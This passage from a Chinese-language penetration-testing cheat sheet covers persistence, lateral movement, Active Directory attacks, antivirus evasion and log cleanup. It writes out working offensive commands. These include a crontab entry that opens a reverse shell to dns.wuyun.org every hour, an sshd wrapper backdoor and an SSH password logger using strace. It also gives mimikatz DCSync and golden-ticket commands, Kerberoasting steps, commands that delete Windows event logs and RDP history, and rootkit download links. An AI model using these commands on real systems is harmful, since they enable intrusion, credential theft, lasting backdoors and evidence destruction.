https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/ New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null 30、Password Filter DLL https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/
31、利用BHO實現IE瀏覽器劫持
https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81/
Linux
crontab
每60分鐘反彈一次shell給dns.wuyun.org的53端口
#!bash(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c")|crontab - 硬鏈接sshd #!bashln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;
鏈接:ssh root@192.168.206.142 -p 2333
SSH Server wrapper
#!bashcd /usr/sbinmv sshd ../binecho '#!/usr/bin/perl' >sshdecho 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshdecho 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshdchmod u+x sshd//不用重啟也行/etc/init.d/sshd restart
socat STDIO TCP4:192.168.206.142:22,sourceport=13377
SSH keylogger
vim當前用戶下的.bashrc文件,末尾添加
#!bashalias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh' source .bashrc
Cymothoa_進程注入backdoor
./cymothoa -p 2270 -s 1 -y 7777nc -vv ip 7777
rootkit
openssh_rootkithttp://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz Kbeast_rootkithttp://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz Mafix + Suterusu rootkit
Tools
Vegilehttps://github.com/Screetsec/Vegilebackdoorhttps://github.com/icco/backdoor
WEB后門
PHP Meterpreter后門 Aspx Meterpreter后門 weevely webacoo....
0x06 橫向滲透
1、端口滲透
端口掃描
- 1.端口的指紋信息(版本信息)
- 2.端口所對應運行的服務
- 3.常見的默認端口號
- 4.嘗試弱口令
端口爆破
hydrahttps://github.com/vanhauser-thc/thc-hydra
端口弱口令
- NTScan
- Hscan
- 自寫腳本
端口溢出
smb
- ms08067
- ms17010
- ms11058
- ...
apacheftp...
常見的默認端口
1、web類(web漏洞/敏感目錄)
第三方通用組件漏洞: struts thinkphp jboss ganglia zabbix ...
80 web 80-89 web 8000-9090 web
2、數據庫類(掃描弱口令)
1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL 50000 DB2
3、特殊服務類(未授權/命令執行類/漏洞)
443 SSL心臟滴血 445 ms08067/ms11058/ms17010等 873 Rsync未授權 5984 CouchDB http://xxx:5984/_utils/ 6379 redis未授權 7001,7002 WebLogic默認弱口令,反序列 9200,9300 elasticsearch 參考WooYun: 多玩某服務器ElasticSearch命令執行漏洞 11211 memcache未授權訪問 27017,27018 Mongodb未授權訪問 50000 SAP命令執行 50070,50030 hadoop默認端口未授權訪問
4、常用端口類(掃描弱口令/端口爆破)
21 ftp 22 SSH 23 Telnet 445 SMB弱口令掃描 2601,2604 zebra路由,默認密碼zebra 3389 遠程桌面 5、端口合計所對應的服務 21 ftp 22 SSH 23 Telnet 25 SMTP 53 DNS 69 TFTP 80 web 80-89 web 110 POP3 135 RPC 139 NETBIOS 143 IMAP 161 SNMP 389 LDAP 443 SSL心臟滴血以及一些web漏洞測試 445 SMB 512,513,514 Rexec 873 Rsync未授權 1025,111 NFS 1080 socks 1158 ORACLE EMCTL2601,2604 zebra路由,默認密碼zebra案 1433 MSSQL (暴力破解) 1521 Oracle:(iSqlPlus Port:5560,7778) 2082/2083 cpanel主機管理系統登陸 (國外用較多) 2222 DA虛擬主機管理系統登陸 (國外用較多) 2601,2604 zebra路由,默認密碼zebra 3128 squid代理默認端口,如果沒設置口令很可能就直接漫游內網了 3306 MySQL (暴力破解) 3312/3311 kangle主機管理系統登陸 3389 遠程桌面 3690 svn 4440 rundeck 參考WooYun: 借用新浪某服務成功漫游新浪內網 4848 GlassFish web中間件 弱口令:admin/adminadmin 5432 PostgreSQL 5900 vnc 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 參考WooYun: Varnish HTTP accelerator CLI 未授權訪問易導致網站被直接篡改或者作為代理進入內網 6379 redis未授權 7001,7002 WebLogic默認弱口令,反序列 7778 Kloxo主機控制面板登錄 8000-9090 都是一些常見的web端口,有些運維喜歡把管理后臺開在這些非80的端口上 8080 tomcat/WDCd/ 主機管理系統,默認弱口令 8080,8089,9090 JBOSS 8081 Symantec AV/Filter for MSE 8083 Vestacp主機管理系統 (國外用較多) 8649 ganglia 8888 amh/LuManager 主機管理系統默認端口 9000 fcgi fcig php執行 9043 websphere[web中間件] 弱口令: admin/admin websphere/ websphere ststem/manager 9200,9300 elasticsearch 參考WooYun: 多玩某服務器ElasticSearch命令執行漏洞 10000 Virtualmin/Webmin 服務器虛擬主機管理系統 11211 memcache未授權訪問 27017,27018 Mongodb未授權訪問 28017 mongodb統計頁面 50000 SAP命令執行 50060 hadoop 50070,50030 hadoop默認端口未授權訪問
2、域滲透
信息搜集
powerview.ps1Get-NetDomain - gets the name of the current user's domainGet-NetForest - gets the forest associated with the current user's domainGet-NetForestDomains - gets all domains for the current forestGet-NetDomainControllers - gets the domain controllers for the current computer's domainGet-NetCurrentUser - gets the current [domain\]usernameGet-NetUser - returns all user objects, or the user specified (wildcard specifiable)Get-NetUserSPNs - gets all user ServicePrincipalNamesGet-NetOUs - gets data for domain organization unitsGet-NetGUIDOUs - finds domain OUs linked to a specific GUIDInvoke-NetUserAdd - adds a local or domain userGet-NetGroups - gets a list of all current groups in the domainGet-NetGroup - gets data for each user in a specified domain groupGet-NetLocalGroups - gets a list of localgroups on a remote host or hostsGet-NetLocalGroup - gets the members of a localgroup on a remote host or hostsGet-NetLocalServices - gets a list of running services/paths on a remote host or hostsInvoke-NetGroupUserAdd - adds a user to a specified local or domain groupGet-NetComputers - gets a list of all current servers in the domainGet-NetFileServers - get a list of file servers used by current domain usersGet-NetShare - gets share information for a specified serverGet-NetLoggedon - gets users actively logged onto a specified serverGet-NetSessions - gets active sessions on a specified serverGet-NetFileSessions - returned combined Get-NetSessions and Get-NetFilesGet-NetConnections - gets active connections to a specific server resource (share)Get-NetFiles - gets open files on a serverGet-NetProcesses - gets the remote processes and owners on a remote server
BloodHound
獲取某OU下所有機器信息
{ "name": "Find the specificed OU computers", "queryList": [ { "final": false, "title": "Select a OU...", "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC" }, { "final": true, "query": "MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p", "allowCollapse": true, "endNode": "{}" } ] }
自動標記owned用戶及機器
SyncDog
https://github.com/Lz1y/SyncDog
獲取域內DNS信息
adidnsdumphttps://github.com/dirkjanm/adidnsdump 域滲透——DNS記錄的獲取https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96/
獲取域控的方法
SYSVOL
SYSVOL是指存儲域公共文件服務器副本的共享文件夾,它們在域中所有的域控制器之間復制。Sysvol文件夾是安裝AD時創建的,它用來存放GPO、Script等信息。同時,存放在Sysvol文件夾中的信息,會復制到域中所有DC上。相關閱讀:
尋找SYSVOL里的密碼和攻擊GPP(組策略偏好)http://www.freebuf.com/vuls/92016.html Windows Server 2008 R2之四管理Sysvol文件夾http://blog.51cto.com/ycrsjxy/203095 SYSVOL中查找密碼并利用組策略首選項https://adsecurity.org/?p=2288 利用SYSVOL還原組策略中保存的密碼https://xz.aliyun.com/t/1653
MS14-068 Kerberos
python ms14-068.py -u 域用戶@域名 -p 密碼 -s 用戶SID -d 域主機
利用mimikatz將工具得到的TGT_domainuser@SERVER.COM.ccache寫入內存,創建緩存證書:
mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exitnet use k: \pentest.comc$
相關閱讀 :
Kerberos的工具包PyKEKhttp://adsecurity.org/?p=676深入解讀MS14-068漏洞http://www.freebuf.com/vuls/56081.htmlKerberos的安全漏洞https://adsecurity.org/?p=541
SPN掃描
Kerberoast可以作為一個有效的方法從Active Directory中以普通用戶的身份提取服務帳戶憑據,無需向目標系統發送任何數據包。SPN是服務在使用Kerberos身份驗證的網絡上的唯一標識符。它由服務類,主機名和端口組成。在使用Kerberos身份驗證的網絡中,必須在內置計算機帳戶(如NetworkService或LocalSystem)或用戶帳戶下為服務器注冊SPN。對于內部帳戶,SPN將自動進行注冊。但是,如果在域用戶帳戶下運行服務,則必須為要使用的帳戶的手動注冊SPN。SPN掃描的主要好處是,SPN掃描不需要連接到網絡上的每個IP來檢查服務端口,SPN通過LDAP查詢向域控執行服務發現,SPN查詢是Kerberos的票據行為一部分,因此比較難檢測SPN掃描。相關閱讀 :
非掃描式的SQL Server發現 https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/ SPN掃描https://adsecurity.org/?p=1508 掃描SQLServer的腳本https://github.com/PyroTek3/PowerShell-AD-Recon
Kerberos的黃金門票
在域上抓取的哈希
lsadump::dcsync /domain:pentest.com /user:krbtgt kerberos::purgekerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribikerberos::ptt administrator.kiribikerberos::tgtnet use k: \pnet use k: \pentest.comc$
相關閱讀 :
https://adsecurity.org/?p=1640 域服務賬號破解實踐http://bobao.#/learning/detail/3564.html Kerberos的認證原理https://blog.csdn.net/wulantian/article/details/42418231 深刻理解windows安全認證機制ntlm&Kerberoshttps://klionsec.github.io/2016/08/10/ntlm-kerberos/
Kerberos的銀票務
黃金票據和白銀票據的一些區別:Golden Ticket:偽造TGT,可以獲取任何Kerberos服務權限 銀票:偽造TGS,只能訪問指定的服務加密方式不同:Golden Ticket由krbtgt的hash加密 Silver Ticket由服務賬號(通常為計算機賬戶)Hash加密 認證流程不同:金票在使用的過程需要同域控通信 銀票在使用的過程不需要同域控通信 相關閱讀 :
攻擊者如何使用Kerberos的銀票來利用系統https://adsecurity.org/?p=2011 域滲透——Pass The Tickethttps://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf
域服務賬號破解
與上面SPN掃描類似的原理https://github.com/nidem/kerberoast獲取所有用作SPN的帳戶
setspn -T PENTEST.com -Q */*
從Mimikatz的RAM中提取獲得的門票
kerberos::list /export
用rgsrepcrack破解
tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
憑證盜竊
從搜集的密碼里面找管理員的密碼
NTLM relay
One API call away from Domain Adminhttps://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/ privexchangehttps://github.com/dirkjanm/privexchange/ Exchange2domainhttps://github.com/ridter/exchange2domain
Kerberos委派
Wagging-the-Dog.htmlhttps://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html s4u2pwnagehttps://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Attacking Kerberos Delegationhttps://xz.aliyun.com/t/2931 用打印服務獲取域控https://adsecurity.org/?p=4056 Computer Takeoverhttps://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/ Combining NTLM Relaying and Kerberos delegationhttps://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ CVE-2019-1040https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/
地址解析協議
實在搞不定再搞ARP
獲取AD哈希
- 使用VSS卷影副本
- Ntdsutil中獲取NTDS.DIT文件
- PowerShell中提取NTDS.DIT -->Invoke-NinaCopy
- 使用Mimikatz提取
mimikatz lsadump::lsa /inject exit
- 使用PowerShell Mimikatz
- 使用Mimikatz的DCSync 遠程轉儲Active Directory憑證 提取 KRBTGT用戶帳戶的密碼數據:
Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit 管理員用戶帳戶提取密碼數據: Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit
- NTDS.dit中提取哈希 使用esedbexport恢復以后使用ntdsxtract提取
AD持久化
活動目錄持久性技巧
https://adsecurity.org/?p=1929DS恢復模式密碼維護 DSRM密碼同步
Windows Server 2008 需要安裝KB961320補丁才支持DSRM密碼同步,Windows Server 2003不支持DSRM密碼同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可參考:[巧用DSRM密碼同步將域控權限持久化](http://drops.xmd5.com/static/drops/tips-9297.html)
DCshadow
https://www.dcshadow.com/
Security Support Provider
簡單的理解為SSP就是一個DLL,用來實現身份認證
privilege::debugmisc::memssp
這樣就不需要重啟c:/windows/system32可看到新生成的文件kiwissp.log
SID History
https://adsecurity.org/?p=1772
SID歷史記錄允許另一個帳戶的訪問被有效地克隆到另一個帳戶
mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator" AdminSDHolder&SDProp
利用AdminSDHolder&SDProp(重新)獲取域管理權限
組策略
https://adsecurity.org/?p=2716 策略對象在持久化及橫向滲透中的應用 https://www.anquanke.com/post/id/86531
Hook PasswordChangeNotify
http://www.vuln.cn/6812
Kerberoasting后門
https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting/
AdminSDHolder
Backdooring AdminSDHolder for Persistencehttps://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
Delegation
Unconstrained Domain Persistencehttps://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
其他
域內主機提權
SharpAddDomainMachinehttps://github.com/Ridter/SharpAddDomainMachine
Exchange的利用
Exchange2domainhttps://github.com/Ridter/Exchange2domainCVE-2018-8581https://github.com/WyAtu/CVE-2018-8581/CVE-2019-1040https://github.com/Ridter/CVE-2019-1040CVE-2020-0688https://github.com/Ridter/CVE-2020-0688NtlmRelayToEWShttps://github.com/Arno0x/NtlmRelayToEWSewsManagehttps://github.com/3gstudent/ewsManage
TIPS
《域滲透——Dump Clear-Text Password after KB2871997 installed》https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed《域滲透——Hook PasswordChangeNotify》http://www.vuln.cn/6812
可通過Hook PasswordChangeNotify實時記錄域控管理員的新密碼
《域滲透——Local Administrator Password Solution》http://www.liuhaihua.cn/archives/179102.html
域滲透時要記得留意域內主機的本地管理員賬號
《域滲透——利用SYSVOL還原組策略中保存的密碼》https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/
相關工具
BloodHoundhttps://github.com/BloodHoundAD/BloodHound CrackMapExechttps://github.com/byt3bl33d3r/CrackMapExec DeathStarhttps://github.com/byt3bl33d3r/DeathStar利用過程:http://www.freebuf.com/sectool/160884.html
在遠程系統上執行程序
- At
- Psexec
- WMIC
- Wmiexec
- Smbexec
- Powershell remoting
- DCOM
- Winrm (https://github.com/Hackplayers/evil-winrm)
IOT相關
1、路由器 routersploithttps://github.com/reverse-shell/routersploit2、打印機 PREThttps://github.com/RUB-NDS/PRET3、IOT exp https://www.exploitee.rs/ 4、相關OWASP-Nettackerisficsmasterhttps://www.owasp.org/index.php/OWASP_Nettacker
中間人
Cainhttp://www.oxid.it/cain.htmlEttercaphttps://github.com/Ettercap/ettercapResponderhttps://github.com/SpiderLabs/ResponderMITMfhttps://github.com/byt3bl33d3r/MITMf3r/MITMf)https://github.com/evilsocket/bettercap
規避殺軟及檢測
Bypass Applocker
UltimateAppLockerByPassListhttps://lolbas-project.github.io/
bypassAV
EmpirePEspinShellterEbowlaVeilPowerShellPython代碼注入技術Process Doppelg?nginghttp://www.4hou.com/technology/9379.html...
0x07 痕跡清理
Windows日志清除
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/
獲取日志分類列表:
wevtutil el >1.txt
獲取單個日志類別的統計信息:eg.
wevtutil gli "windows powershell"
回顯:
creationTime: 2016-11-28T06:01:37.986ZlastAccessTime: 2016-11-28T06:01:37.986ZlastWriteTime: 2017-08-08T08:01:20.979ZfileSize: 1118208attributes: 32numberOfLogRecords: 1228oldestRecordNumber: 1
查看指定日志的具體內容:
wevtutil qe /f:text "windows powershell"
刪除單個日志類別的所有信息:
wevtutil cl "windows powershell"
破壞Windows日志記錄功能
利用工具
Invoke-Phant0mhttps://github.com/hlldz/Invoke-Phant0m Windwos-EventLog-Bypasshttps://github.com/3gstudent/Windwos-EventLog-Bypass
msf
run clearlogsclearev
3389登陸記錄清除
@echo off@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f@del "%USERPROFILE%\My Documents\Default.rdp" /a@exit
VSole
網絡安全專家